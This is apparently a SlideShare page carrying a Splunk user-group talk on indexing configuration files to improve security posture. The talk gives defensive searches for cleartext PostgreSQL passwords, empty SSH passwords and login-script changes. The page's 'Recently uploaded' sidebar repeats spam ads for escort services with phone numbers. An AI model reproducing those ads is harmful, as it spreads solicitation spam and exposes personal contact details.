SFBA Splunk Usergroup meeting May 3, 2023
 
SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023SFBA Splunk User Group Meeting February 2023
SFBA Splunk User Group Meeting February 2023
 
SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022SFBA Splunk Usergroup meeting December 2022
SFBA Splunk Usergroup meeting December 2022
 
SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022SFBA Usergroup meeting November 2, 2022
SFBA Usergroup meeting November 2, 2022
 
SF Bay Area Splunk User Group Meeting October 5, 2022
SF Bay Area Splunk User Group Meeting October 5, 2022SF Bay Area Splunk User Group Meeting October 5, 2022
SF Bay Area Splunk User Group Meeting October 5, 2022
 
SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022SFBA Splunk User Group Meeting August 10, 2022
SFBA Splunk User Group Meeting August 10, 2022
 
SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022SFBA Splunk Usergroup meeting July 13, 2022
SFBA Splunk Usergroup meeting July 13, 2022
 
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdfdesigning-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
designing-resilient-cloud-native-splunk-arch-in-aws-austin-rose.pdf
 
Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021Getting Started with Splunk Observability September 8, 2021
Getting Started with Splunk Observability September 8, 2021
 
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
Advanced Outlier Detection and Noise Reduction with Splunk & MLTK August 11, ...
 

Recently uploaded

(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Serviceranjana rawat
 
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /WhatsappsBeautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsappssapnasaifi408
 
Ukraine War presentation: KNOW THE BASICS
Ukraine War presentation: KNOW THE BASICSUkraine War presentation: KNOW THE BASICS
Ukraine War presentation: KNOW THE BASICSAishani27
 
From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...Florian Roscheck
 
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfKantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfSocial Samosa
 
Data Warehouse , Data Cube Computation
Data Warehouse , Data Cube ComputationData Warehouse , Data Cube Computation
Data Warehouse , Data Cube Computationsit20ad004
 
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdf
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdfMarket Analysis in the 5 Largest Economic Countries in Southeast Asia.pdf
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdfRachmat Ramadhan H
 
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptdokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptSonatrach
 
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptxEMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptxthyngster
 
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...soniya singh
 
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...Jack DiGiovanna
 
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...Suhani Kapoor
 
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130Suhani Kapoor
 
Unveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data AnalystUnveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data AnalystSamantha Rae Coolbeth
 
100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptx100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptxAnupama Kate
 
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...Suhani Kapoor
 
Dubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls DubaiDubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls Dubaihf8803863
 

Recently uploaded (20)

(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
(PARI) Call Girls Wanowrie ( 7001035870 ) HI-Fi Pune Escorts Service
 
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /WhatsappsBeautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
Beautiful Sapna Vip Call Girls Hauz Khas 9711199012 Call /Whatsapps
 
Ukraine War presentation: KNOW THE BASICS
Ukraine War presentation: KNOW THE BASICSUkraine War presentation: KNOW THE BASICS
Ukraine War presentation: KNOW THE BASICS
 
From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...From idea to production in a day – Leveraging Azure ML and Streamlit to build...
From idea to production in a day – Leveraging Azure ML and Streamlit to build...
 
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdfKantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
Kantar AI Summit- Under Embargo till Wednesday, 24th April 2024, 4 PM, IST.pdf
 
Data Warehouse , Data Cube Computation
Data Warehouse , Data Cube ComputationData Warehouse , Data Cube Computation
Data Warehouse , Data Cube Computation
 
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
VIP Call Girls Service Charbagh { Lucknow Call Girls Service 9548273370 } Boo...
 
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdf
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdfMarket Analysis in the 5 Largest Economic Countries in Southeast Asia.pdf
Market Analysis in the 5 Largest Economic Countries in Southeast Asia.pdf
 
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.pptdokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
dokumen.tips_chapter-4-transient-heat-conduction-mehmet-kanoglu.ppt
 
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptxEMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
EMERCE - 2024 - AMSTERDAM - CROSS-PLATFORM TRACKING WITH GOOGLE ANALYTICS.pptx
 
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...
High Class Call Girls Noida Sector 39 Aarushi 🔝8264348440🔝 Independent Escort...
 
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in Kishangarh
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in KishangarhDelhi 99530 vip 56974 Genuine Escort Service Call Girls in Kishangarh
Delhi 99530 vip 56974 Genuine Escort Service Call Girls in Kishangarh
 
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
Building on a FAIRly Strong Foundation to Connect Academic Research to Transl...
 
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
VIP High Class Call Girls Bikaner Anushka 8250192130 Independent Escort Servi...
 
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
VIP Call Girls Service Miyapur Hyderabad Call +91-8250192130
 
Unveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data AnalystUnveiling Insights: The Role of a Data Analyst
Unveiling Insights: The Role of a Data Analyst
 
100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptx100-Concepts-of-AI by Anupama Kate .pptx
100-Concepts-of-AI by Anupama Kate .pptx
 
E-Commerce Order PredictionShraddha Kamble.pptx
E-Commerce Order PredictionShraddha Kamble.pptxE-Commerce Order PredictionShraddha Kamble.pptx
E-Commerce Order PredictionShraddha Kamble.pptx
 
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...
VIP High Class Call Girls Jamshedpur Anushka 8250192130 Independent Escort Se...
 
Dubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls DubaiDubai Call Girls Wifey O52&786472 Call Girls Dubai
Dubai Call Girls Wifey O52&786472 Call Girls Dubai
 

Splunking configfiles 20211208_daniel_wilson

  • 1. Copyright © 2011, Splunk Inc. Listen to your data. 11/4/2021 Daniel Wilson Senior Security Engineer Splunk your Configs to Improve Security Posture
  • 2. Copyright © 2011, Splunk Inc. Listen to your data. Agenda 2 • Introductions • What is a Config file? • Preparing Splunk • Use Cases • Gotcha’s • Q&A
  • 3. Copyright © 2011, Splunk Inc. Listen to your data. Summary 3 A quick security talk to discuss how and why you would want to index your config files.
  • 4. Copyright © 2011, Splunk Inc. Listen to your data. Introductions – Daniel Wilson 4 • Security? IT guy? Hey you? • Security more or less 8 years now • Selling computers in ’97 • Speaks randomly Splunk User Group • Formal Career and Skills development coach at StubHub/eBay through Leader a Coach program and Jr talent development Splunk Blogged About these features in 2007, that’s where I learned these tricks https://www.splunk.com/en_us/blog/tips-and-tricks/dont-forget-to-index-your-config-files.html
  • 5. Copyright © 2011, Splunk Inc. Listen to your data. Introductions – Establish Credibility 5 40 Certs over the years….no idea what is expired • Splunk Arch level 2, Splunk Admin, Splunk Power User • AWS Security Specialist, MCSE Security, CCNA Sec, Security+, CySA+ • RHCSA, Cloud+, Linux+, CCNP Routing/Switching • MTA Software Development, MTA Python Other Stuffz • Active defense, Cloud Security, Network/Systems Security and Automation • CIS and MITRE • GDPR, PCI and SOX • DevOps Culture
  • 6. Copyright © 2011, Splunk Inc. Listen to your data. Introduction Audience 6 • Who’s in the audience? – Splunk Admins – Security Folk – Auditors – ComplianceAuditors, Compliance
  • 7. Copyright © 2011, Splunk Inc. Listen to your data. What is a Config File 7 • Flat file generally containing key values • Read by apps when they start/stop • Often contain critical settings • Example of a SSHD Config • “ini” files on Windows
  • 8. Copyright © 2011, Splunk Inc. Listen to your data. Use Cases – Why Splunk? 8 • Monitoring your configs critical part of your File Integrity Monitoring Strategy (FIM) • Tools like AIDE tell you something changed • Auditd, tells you who changed and when • Both AIDE and Auditd lack content • GIT managed Configs are great… security professionals have been burned with lack of enforcement though.
  • 9. Copyright © 2011, Splunk Inc. Listen to your data. Use Case – Looking at configs! 9 • Make easy to use dashboard for auditors and non-technical users • Tip: Rmcomments macro included to ease reading
  • 10. Copyright © 2011, Splunk Inc. Listen to your data. Use Case – Comparing Config 10 • Compare files manually • Enrich your alerts with just the details index=configs source=/etc/ssh/sshd_config | head 2 | diff pos1=1 pos2=2
  • 11. Copyright © 2011, Splunk Inc. Listen to your data. Use Case – Alert on Login Script Changes 11 • Actual control I implemented that later caught our internal RedTeam after getting p0wned. • Add a input for all your login scripts for your platform • Run this job every 15 minutes index=configs source="/home/*/.bash*"
  • 12. Copyright © 2011, Splunk Inc. Listen to your data. Use Cases – Clear Text in Database 12 • Example of detecting of clear text passwords in PostGres • Note inline search extractions, will not extract by default • Tip: Add CIM fields like App to your results to improve searches index=configs sourcetype=config_file source=*pg_hba* " password" | dedup host, source | rex field=_raw "host.*(?<insecure>password)" | eval message = "Clear text passwords accepted by PostGres" | eval app = "Postgres" | table host, source, _raw, app
  • 13. Copyright © 2011, Splunk Inc. Listen to your data. Use Case – SSHD Empty Passwords? 13 • Great Compliance Search right here, tweakable • Not you might want to script the input in here • Tip: Enrich your alerts with MITRE details index=configs sourcetype=config_file source=/etc/ssh/sshd_config earliest=-48h latest=now | dedup index, sourcetype, host, source | rex mode=sed "s/#PasswordAuthentication yes//g" | search "PermitEmptyPasswords yes" OR "PermitEmptyPasswords Yes" | eval vrisk_score = 100, domain="Endpoint", dest=host, dest_dns=host | eval reason="Endpoint - SSH PermitEmptyPasswords yes set" | eval MITRE="T1110" | eval _time = now() | table dest, vrisk_score, domain, reason, MITRE
  • 14. Copyright © 2011, Splunk Inc. Listen to your data. Use Case – Config Drift 14 • By using md5 function we can see the drift • Consider sorting by your data gardens for compliance reports
  • 15. Copyright © 2011, Splunk Inc. Listen to your data. Splunk Admin 15 • Splunk_TA_nix does all this • Props • Inputs • Indexes • I put all this in an app called TA-configsdemo on Splunkbase to help you play with these settings without dealing with Splunk_TA_nix
  • 16. Copyright © 2011, Splunk Inc. Listen to your data. Splunk – Props.conf 16 • Rather than creating events, Splunk create one event per file • You can and should review your settings with btool • I noticed 4 settings in props.conf that are worthy conversations • Btool on your indexer and search head AUTO_KV_JSON = true CHECK_METHOD = modtime DATETIME_CONFIG = NONE KV_MODE = none $ ./splunk cmd btool props list config_file
  • 17. Copyright © 2011, Splunk Inc. Listen to your data. Props - AUTO_KV_JSON 17 AUTO_KV_JSON = <boolean> * Used for search-time field extractions only. * Specifies whether to try json extraction automatically. * Default: true • Meaning if your file is well structured JSON you will get field extraction by default. • I used another sourcetype for this
  • 18. Copyright © 2011, Splunk Inc. Listen to your data. Props - CHECK_METHOD = modtime 18 File checksum configuration * Set CHECK_METHOD to "endpoint_md5" to have Splunk software perform a checksum of the first and last 256 bytes of a file. When it finds matches, Splunk software lists the file as already indexed and indexes only new data, or ignores it if there is no new data. * Set CHECK_METHOD to "modtime" to check only the modification time of the file. • Super helpful on config files that are really small and don’t have enough characters to be checked with the first and last 256. Avoid the “too small problem” in Splunk sourcetypes.
  • 19. Copyright © 2011, Splunk Inc. Listen to your data. Props - DATETIME_CONFIG = NONE 19 "NONE" leaves the event time set to whatever time was selected by the input layer * For data sent by Splunk forwarders over the Splunk-to-Splunk protocol, the input layer is the time that was selected on the forwarder by its input behavior (as below). * For file-based inputs (monitor, batch) the time chosen is the modification timestamp on the file being read. * For other inputs, the time chosen is the current system time when the event is read from the pipe/socket/etc. * Both "CURRENT" and "NONE" explicitly disable the per-text timestamp identification, so the default event boun • In this case a config_file time stamped by your operating system like in centOS might be dated 6-7 years ago. You need to consider this in your indexer retention strategy.
  • 20. Copyright © 2011, Splunk Inc. Listen to your data. Props - KV_MODE = none 20 * none: if you want no field/value extraction to take place. • You will NOT get field extractions by default from your Config files • While a lot of your config_files are going to be key value they are going to be large and this is going to be expensive to turn on.
  • 21. Copyright © 2011, Splunk Inc. Listen to your data. inputs.conf 21 [monitor:///etc/ssh/sshd_conf*] index=configs sourcetype=config_file If you have Splunk_TA_Nix installed or configured your props.conf as we mentioned the source will work.
  • 22. Copyright © 2011, Splunk Inc. Listen to your data. inputs.conf, cont 22 • Trick to cat a file in • Time will be NOW • Saved our auditor days • MD5 identical • Make sure the file is there! … do-execcat() { # display config if [ -f "$strConfigLocation" ]; then cat $strConfigLocation fi } … [script://./bin/cat_sshd_config.sh] index=osnixvcustom sourcetype=config_file source=/etc/ssh/sshd_config interval=86400
  • 23. Copyright © 2011, Splunk Inc. Listen to your data. Indexer Stuff 23 • Very low sourcetype uniformity • Don’t recommend you mix it with other types for this reason • Ideally not a default index you would search either due to a large set of characters and strings vs a traditional log
  • 24. Copyright © 2011, Splunk Inc. Listen to your data. Gotcha’s 24 • Config files are cheap • Watch out for shared file systems • Ensure your index permissions are well managed • Don’t index any secrets you don’t want collected
  • 25. Copyright © 2011, Splunk Inc. Listen to your data. Thank You :)